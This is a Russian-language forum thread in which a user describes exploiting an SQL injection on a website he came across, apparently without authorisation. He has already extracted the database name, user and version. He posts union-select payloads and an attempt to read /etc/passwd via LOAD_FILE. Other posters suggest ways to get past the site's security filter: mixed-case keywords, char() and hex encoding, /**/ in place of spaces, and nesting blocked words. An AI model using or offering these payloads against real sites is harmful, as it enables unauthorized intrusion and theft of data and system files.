Поиск  Пользователи  Правила 
Закрыть
Логин:
Пароль:
Забыли свой пароль?
Войти
 
Страницы: 1
RSS
SQL-injection-нужен совет
 
При просмотре одного сайта обнаружил SQL-injection. Подобрал количество полей в таблице:
http:www.site.ru/script.php?id=-999+union+select+1,2,3,4,5,6/*.Затем вытянул имя БД, юзера и
версию БД:4.1.20-lk-log. Однако далее ничего не идёт. На разного рода запросы приходит ответ либо:Ошибка: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '),3,4,5,6/*' at line 1 ;
либо происходит редирект на страничку insecure с сообщением: Ваш запрос отвергнут по причине его возможной небезопасности.
Пожалуйста, обратитесь в службу технической поддержки (support@site.ru) за дополнительной информацией.
ВОПРОС-как быть и что тут можно сделать????
ЗЫ:респект Skvoznoy, читал твою статью в ][ про терминалы-занимательное чтение!!
 
Цитата
Ваш запрос отвергнут по причине его возможной небезопасности.
ну работает какой то фильтр, пытайся изменить свой запрос:

1+and(1=3)+union+select+1,2,3,4,5,6/*
-999+UnIoN+sElEcT+.......

+ попробуй использовать функции типа char()
 
интересная статья есть на antichat там как раз о фильтрации акцент!!! попробуй в 16 ом представлении забацать запрос
 
например фильтруются +
пробуй заменить на /**/
 
2 C0nstr!ktoR
Причем тут Сквозной и SQL - инъекция???
 
ссылочку поконкретнее на antichat, пожалуйста

razor-вопрос дурацкий, отвечать бессмысленно!
 
Опять облом!!!!!!!!!!!!!
При запросе вида http:www.site.ru/script.php?id=-999+union+select+1,LOAD_FILE('ETC/PASSWD'),3,4,5,6/* вновь происходит редирект на страничку insecure. Если же закодировать выражение с помощъю char()? то браузер выдаёт просто надпись "LOAD_FILE('ETC/PASSWD')" ЕСТЬ ЕЩЁ КАКИЕ-НИБУДЬ МЫСЛИ?????????????????
 
Понял! Фильтруется слово "FROM" однако подменить его никак не получается-вылетает ошибка SQL
 
Пробуй так:
frFROMom
Страницы: 1
Читают тему